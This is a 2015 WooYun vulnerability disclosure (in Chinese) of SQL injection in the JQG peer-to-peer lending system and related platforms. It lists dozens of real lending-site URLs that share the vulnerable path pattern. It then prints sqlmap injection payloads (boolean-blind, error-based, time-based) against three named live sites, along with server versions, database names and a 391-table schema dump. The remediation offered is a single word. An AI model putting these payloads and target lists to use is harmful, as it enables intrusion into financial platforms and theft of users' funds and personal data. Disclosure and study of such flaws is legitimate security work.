当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0126127

漏洞标题:金钱柜网贷系统及与其类似系统存在注入漏洞(涉及大量网贷网站)

相关厂商:金钱柜网贷

漏洞作者: 路人甲

提交时间:2015-07-15 10:23

修复时间:2015-10-15 17:08

公开时间:2015-10-15 17:08

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-15: 细节已通知厂商并且等待厂商处理中
2015-07-17: 厂商已经确认,细节仅向厂商公开
2015-07-20: 细节向第三方安全合作伙伴开放
2015-09-10: 细节向核心白帽子及相关领域专家公开
2015-09-20: 细节向普通白帽子公开
2015-09-30: 细节向实习白帽子公开
2015-10-15: 细节向公众公开

简要描述:

大量网贷系统存在注入漏洞,总投资从几百万到上亿的网站都有,是不是可以修改后台资金数据后提现?是不是可以登录别人账号提现?危害可想而知!

详细说明:

先罗列下找的几个网贷平台

https://www.sukedai.com/meitibaodao/a4098.html
http://www.kkkdai.com/hetong/31411614799/a266.html
http://www.smjr365.com/hetong/11413440348/a236.html
http://shunchangcaifu.com/hetong/11433902457/a266.html
http://wenbangjinrong.com/hetong/20771431501740/a301.html
http://www.zhuoxincf.com/hetong/11426320337/a361.html
http://bccht.com/hetong/11426906332/a260.html
http://www.lurongdai.com/hetong/11419819051/a230.html
http://www.hengdacaifu.com/hetong/11424138394/a358.html
http://www.zjnbcf.com/hetong/11434417762/a311.html
http://www.smjr365.com/hetong/11413440478/a239.html
https://www.fyjrw.com/hetong/171411698323/a365.html
http://wangdai168.com/hetong/11415671635/a206.html
http://www.xuefudai.com/hetong/11400834579/a193.html
http://www.bccht.com/hetong/11427420975/a252.html
http://www.btzhd.com/hetong/11418107944/a513.html
http://www.mingfucaifu.com/hetong/a207.html
http://www.donglingdai.com/hetong/11426081940/a280.html
http://www.zndai.com/hetong/11422237766/a319.html
http://www.qduoduo.net/hetong/20131422952463/a307.html
http://www.xsbvc.com/hetong/11433815693/a251.html
http://www.mingyedai.com/hetong/11423107497/a266.html
http://yolo100.net/hetong/11433834019/a266.html
http://www.btzhd.com/hetong/11406003017/a362.html
http://ludongchuangtou.com/hetong/11422410934/a241.html
http://xinruncaifu.com/hetong/11422087813/a235.html
http://chengyuecaifu.com/hetong/11426987910/a240.html
http://leyuancaifu.com/hetong/11423816917/a267.html
http://zhuoxincf.com/hetong/11430876601/a437.html
http://www.hengdacaifu.com/hetong/11435657481/a599.html
http://fuhuajinrong.com/hetong/11433401169/a304.html
http://donglingdai.com/hetong/6401432794278/a460.html
http://bccht.com/hetong/2881435573730/a424.html
http://qinghuacaifu.com/hetong/11434182603/a279.html
http://zhengdaguquan.com/hetong/3181436084337/a416.html
http://sdxpct.com/hetong/11429853648/a276.html
http://miaomiaocaifu.com/hetong/11431170534/a656.html
http://www.hongshuncaifu.com/hetong/11436172638/a232.html
http://longmaocaifu.com/hetong/11430725945/a270.html
http://www.91toufang.com/hetong/11435148183/a242.html
http://www.yikuaict.com/hetong/4221436408356/a400.html
http://www.jufuyidai.com/hetong/3711436410305/a349.html
http://haohaochuangtou.com/hetong/11432368769/a273.html
http://www.153mh.com/hetong/11380443494/a45.html
http://wangdai168.com/hetong/11415843232/a207.html
格式:http://domain/hetong/数字/a数字.html


涉及系统有 jqg(金钱柜),yyd(不知),deayou(帝友),hlwd(不知)
基础应该是同一个程序吧。

漏洞证明:

http://chengyuecaifu.com
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://chengyuecaifu.com:80/hetong/11432029595/a298 AND 4698=4698.html
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: http://chengyuecaifu.com:80/hetong/11432029595/a298 AND (SELECT 1973 FROM(SELECT COUNT(*),CONCAT(0x7171756371,(SELECT (CASE WHEN (1973=1973) THEN 1 ELSE 0 END)),0x716c736471,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a).html
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: http://chengyuecaifu.com:80/hetong/11432029595/a298 AND SLEEP(30).html
---
web server operating system: Linux Ubuntu
web application technology: PHP 5.5.9
back-end DBMS: MySQL 5.0
Database: jqg2
[391 tables]
+-----------------------------------+
| jqg_account |
| jqg_account_balance |
| jqg_account_bank |
| jqg_account_cash |
| jqg_account_log |
| jqg_account_payment |
| jqg_account_recharge |
| jqg_account_users |
| jqg_account_users_bank |
| jqg_account_web |
| jqg_amount_type |
| jqg_approve |
| jqg_approve_edu |
| jqg_approve_edu_id5 |
| jqg_approve_flow |
| jqg_approve_id5 |
| jqg_approve_invite |
| jqg_approve_realname |
| jqg_approve_sms |
| jqg_approve_smslog |
| jqg_approve_video |
| jqg_areas |
| jqg_article_fields |
| jqg_articles |
| jqg_articles_fields |
| jqg_articles_pages |
| jqg_articles_type |
| jqg_attestations |
| jqg_attestations_type |
| jqg_attestations_user |
| jqg_borrow |
| jqg_borrow_amount |
| jqg_borrow_amount_apply |
| jqg_borrow_amount_log |
| jqg_borrow_amount_type |
| jqg_borrow_auto |
| jqg_borrow_autolog |
| jqg_borrow_change |
| jqg_borrow_count |
| jqg_borrow_count_log |
| jqg_borrow_credit |
| jqg_borrow_line |
| jqg_borrow_otherloan |
| jqg_borrow_recover |
| jqg_borrow_repay |
| jqg_borrow_shenqing |
| jqg_borrow_tender |
| jqg_borrow_tender_auto |
| jqg_borrow_tender_autolog |
| jqg_borrow_tender_web |
| jqg_borrow_vouch |
| jqg_borrow_vouch_recover |
| jqg_borrow_vouch_repay |
| jqg_comment |
| jqg_comments |
| jqg_common_admincp_cmenu |
| jqg_common_admincp_group |
| jqg_common_admincp_member |
| jqg_common_admincp_perm |
| jqg_common_admincp_session |
| jqg_common_admingroup |
| jqg_common_adminnote |
| jqg_common_advertisement |
| jqg_common_advertisement_custom |
| jqg_common_banned |
| jqg_common_block |
| jqg_common_block_favorite |
| jqg_common_block_item |
| jqg_common_block_item_data |
| jqg_common_block_permission |
| jqg_common_block_pic |
| jqg_common_block_style |
| jqg_common_block_xml |
| jqg_common_cache |
| jqg_common_card |
| jqg_common_card_log |
| jqg_common_card_type |
| jqg_common_connect_guest |
| jqg_common_credit_log |
| jqg_common_credit_rule |
| jqg_common_credit_rule_log |
| jqg_common_credit_rule_log_field |
| jqg_common_cron |
| jqg_common_devicetoken |
| jqg_common_district |
| jqg_common_diy_data |
| jqg_common_domain |
| jqg_common_failedlogin |
| jqg_common_friendlink |
| jqg_common_grouppm |
| jqg_common_invite |
| jqg_common_magic |
| jqg_common_magiclog |
| jqg_common_mailcron |
| jqg_common_mailqueue |
| jqg_common_member |
| jqg_common_member_action_log |
| jqg_common_member_connect |
| jqg_common_member_count |
| jqg_common_member_crime |
| jqg_common_member_field_forum |
| jqg_common_member_field_home |
| jqg_common_member_grouppm |
| jqg_common_member_log |
| jqg_common_member_magic |
| jqg_common_member_medal |
| jqg_common_member_profile |
| jqg_common_member_profile_setting |
| jqg_common_member_security |
| jqg_common_member_stat_field |
| jqg_common_member_status |
| jqg_common_member_validate |
| jqg_common_member_verify |
| jqg_common_member_verify_info |
| jqg_common_myapp |
| jqg_common_myinvite |
| jqg_common_mytask |
| jqg_common_nav |
| jqg_common_onlinetime |
| jqg_common_patch |
| jqg_common_plugin |
| jqg_common_pluginvar |
| jqg_common_process |
| jqg_common_regip |
| jqg_common_relatedlink |
| jqg_common_report |
| jqg_common_searchindex |
| jqg_common_secquestion |
| jqg_common_session |
| jqg_common_setting |
| jqg_common_smiley |
| jqg_common_sphinxcounter |
| jqg_common_stat |
| jqg_common_statuser |
| jqg_common_style |
| jqg_common_stylevar |
| jqg_common_syscache |
| jqg_common_tag |
| jqg_common_tagitem |
| jqg_common_task |
| jqg_common_taskvar |
| jqg_common_template |
| jqg_common_template_block |
| jqg_common_template_permission |
| jqg_common_uin_black |
| jqg_common_usergroup |
| jqg_common_usergroup_field |
| jqg_common_word |
| jqg_common_word_type |
| jqg_connect_disktask |
| jqg_connect_feedlog |
| jqg_connect_memberbindlog |
| jqg_connect_postfeedlog |
| jqg_connect_tthreadlog |
| jqg_credit |
| jqg_credit_class |
| jqg_credit_log |
| jqg_credit_rank |
| jqg_credit_type |
| jqg_examines |
| jqg_forum_access |
| jqg_forum_activity |
| jqg_forum_activityapply |
| jqg_forum_announcement |
| jqg_forum_attachment |
| jqg_forum_attachment_0 |
| jqg_forum_attachment_1 |
| jqg_forum_attachment_2 |
| jqg_forum_attachment_3 |
| jqg_forum_attachment_4 |
| jqg_forum_attachment_5 |
| jqg_forum_attachment_6 |
| jqg_forum_attachment_7 |
| jqg_forum_attachment_8 |
| jqg_forum_attachment_9 |
| jqg_forum_attachment_exif |
| jqg_forum_attachment_unused |
| jqg_forum_attachtype |
| jqg_forum_bbcode |
| jqg_forum_collection |
| jqg_forum_collectioncomment |
| jqg_forum_collectionfollow |
| jqg_forum_collectioninvite |
| jqg_forum_collectionrelated |
| jqg_forum_collectionteamworker |
| jqg_forum_collectionthread |
| jqg_forum_creditslog |
| jqg_forum_debate |
| jqg_forum_debatepost |
| jqg_forum_faq |
| jqg_forum_forum |
| jqg_forum_forum_threadtable |
| jqg_forum_forumfield |
| jqg_forum_forumrecommend |
| jqg_forum_groupcreditslog |
| jqg_forum_groupfield |
| jqg_forum_groupinvite |
| jqg_forum_grouplevel |
| jqg_forum_groupuser |
| jqg_forum_imagetype |
| jqg_forum_medal |
| jqg_forum_medallog |
| jqg_forum_memberrecommend |
| jqg_forum_moderator |
| jqg_forum_modwork |
| jqg_forum_onlinelist |
| jqg_forum_order |
| jqg_forum_poll |
| jqg_forum_polloption |
| jqg_forum_pollvoter |
| jqg_forum_post |
| jqg_forum_post_location |
| jqg_forum_post_moderate |
| jqg_forum_post_tableid |
| jqg_forum_postcache |
| jqg_forum_postcomment |
| jqg_forum_postlog |
| jqg_forum_poststick |
| jqg_forum_promotion |
| jqg_forum_ratelog |
| jqg_forum_relatedthread |
| jqg_forum_replycredit |
| jqg_forum_rsscache |
| jqg_forum_spacecache |
| jqg_forum_statlog |
| jqg_forum_thread |
| jqg_forum_thread_moderate |
| jqg_forum_threadaddviews |
| jqg_forum_threadclass |
| jqg_forum_threadclosed |
| jqg_forum_threaddisablepos |
| jqg_forum_threadimage |
| jqg_forum_threadlog |
| jqg_forum_threadmod |
| jqg_forum_threadpartake |
| jqg_forum_threadpreview |
| jqg_forum_threadrush |
| jqg_forum_threadtype |
| jqg_forum_trade |
| jqg_forum_tradecomment |
| jqg_forum_tradelog |
| jqg_forum_typeoption |
| jqg_forum_typeoptionvar |
| jqg_forum_typevar |
| jqg_forum_warning |
| jqg_group_log |
| jqg_home_album |
| jqg_home_album_category |
| jqg_home_appcreditlog |
| jqg_home_blacklist |
| jqg_home_blog |
| jqg_home_blog_category |
| jqg_home_blog_moderate |
| jqg_home_blogfield |
| jqg_home_class |
| jqg_home_click |
| jqg_home_clickuser |
| jqg_home_comment |
| jqg_home_comment_moderate |
| jqg_home_docomment |
| jqg_home_doing |
| jqg_home_doing_moderate |
| jqg_home_favorite |
| jqg_home_feed |
| jqg_home_feed_app |
| jqg_home_follow |
| jqg_home_follow_feed |
| jqg_home_follow_feed_archiver |
| jqg_home_friend |
| jqg_home_friend_request |
| jqg_home_friendlog |
| jqg_home_notification |
| jqg_home_pic |
| jqg_home_pic_moderate |
| jqg_home_picfield |
| jqg_home_poke |
| jqg_home_pokearchive |
| jqg_home_share |
| jqg_home_share_moderate |
| jqg_home_show |
| jqg_home_specialuser |
| jqg_home_userapp |
| jqg_home_userappfield |
| jqg_home_visitor |
| jqg_linkages |
| jqg_linkages_type |
| jqg_links |
| jqg_links_type |
| jqg_message |
| jqg_message_receive |
| jqg_mobile_setting |
| jqg_modules |
| jqg_payment |
| jqg_portal_article_content |
| jqg_portal_article_count |
| jqg_portal_article_moderate |
| jqg_portal_article_related |
| jqg_portal_article_title |
| jqg_portal_article_trash |
| jqg_portal_attachment |
| jqg_portal_category |
| jqg_portal_category_permission |
| jqg_portal_comment |
| jqg_portal_comment_moderate |
| jqg_portal_rsscache |
| jqg_portal_topic |
| jqg_portal_topic_pic |
| jqg_raise |
| jqg_raise_tender |
| jqg_rating_assets |
| jqg_rating_company |
| jqg_rating_contact |
| jqg_rating_educations |
| jqg_rating_finance |
| jqg_rating_houses |
| jqg_rating_info |
| jqg_rating_job |
| jqg_remind |
| jqg_remind_type |
| jqg_remind_user |
| jqg_scrollpic |
| jqg_scrollpic_type |
| jqg_security_evilpost |
| jqg_security_eviluser |
| jqg_security_failedlog |
| jqg_site |
| jqg_site_menu |
| jqg_sms_type |
| jqg_spread_add |
| jqg_spread_log |
| jqg_spread_setting |
| jqg_spread_user |
| jqg_system |
| jqg_system_type |
| jqg_ucenter |
| jqg_ucenter_admins |
| jqg_ucenter_applications |
| jqg_ucenter_badwords |
| jqg_ucenter_domains |
| jqg_ucenter_failedlogins |
| jqg_ucenter_feeds |
| jqg_ucenter_friends |
| jqg_ucenter_mailqueue |
| jqg_ucenter_memberfields |
| jqg_ucenter_members |
| jqg_ucenter_mergemembers |
| jqg_ucenter_newpm |
| jqg_ucenter_notelist |
| jqg_ucenter_pm_indexes |
| jqg_ucenter_pm_lists |
| jqg_ucenter_pm_members |
| jqg_ucenter_pm_messages_0 |
| jqg_ucenter_pm_messages_1 |
| jqg_ucenter_pm_messages_2 |
| jqg_ucenter_pm_messages_3 |
| jqg_ucenter_pm_messages_4 |
| jqg_ucenter_pm_messages_5 |
| jqg_ucenter_pm_messages_6 |
| jqg_ucenter_pm_messages_7 |
| jqg_ucenter_pm_messages_8 |
| jqg_ucenter_pm_messages_9 |
| jqg_ucenter_protectedmembers |
| jqg_ucenter_set |
| jqg_ucenter_settings |
| jqg_ucenter_sqlcache |
| jqg_ucenter_tags |
| jqg_ucenter_vars |
| jqg_users |
| jqg_users_admin |
| jqg_users_admin_type |
| jqg_users_adminlog |
| jqg_users_avatar_log |
| jqg_users_black |
| jqg_users_care |
| jqg_users_email |
| jqg_users_email_active |
| jqg_users_email_log |
| jqg_users_friends |
| jqg_users_friends_invite |
| jqg_users_friends_type |
| jqg_users_info |
| jqg_users_log |
| jqg_users_rebut |
| jqg_users_type |
| jqg_users_upfiles |
| jqg_users_vip |
| jqg_users_visit |
| jqg_vote |
| jqg_vote_answer |
| jqg_vote_type |
| jqg_yyt_account_check |
+-----------------------------------+
http://wangdai168.com
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://wangdai168.com:80/hetong/11415843232/a207 AND 4275=4275.html
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
Payload: http://wangdai168.com:80/hetong/11415843232/a207 AND EXTRACTVALUE(4454,CONCAT(0x5c,0x71727a6b71,(SELECT (CASE WHEN (4454=4454) THEN 1 ELSE 0 END)),0x7176797871)).html
---
web server operating system: Windows
web application technology: Apache 2.4.10, PHP 5.2.17
back-end DBMS: MySQL 5.1
available databases [1]:
[*] wa3f2njgj7dai16h83d
http://www.kkkdai.com
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.kkkdai.com:80/hetong/31411614799/a266 AND 8136=8136.html
---
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://www.kkkdai.com:80/hetong/31411614799/a266 AND 8136=8136.html
---
web application technology: Apache
back-end DBMS: MySQL 5
available databases [1]:
[*] bdm0360063_db


服务器都用的阿里云,或者有安全狗,表不容易跑。

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-07-17 17:06

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商或网站管理单位的直接处置渠道,待认领。

最新状态:

暂无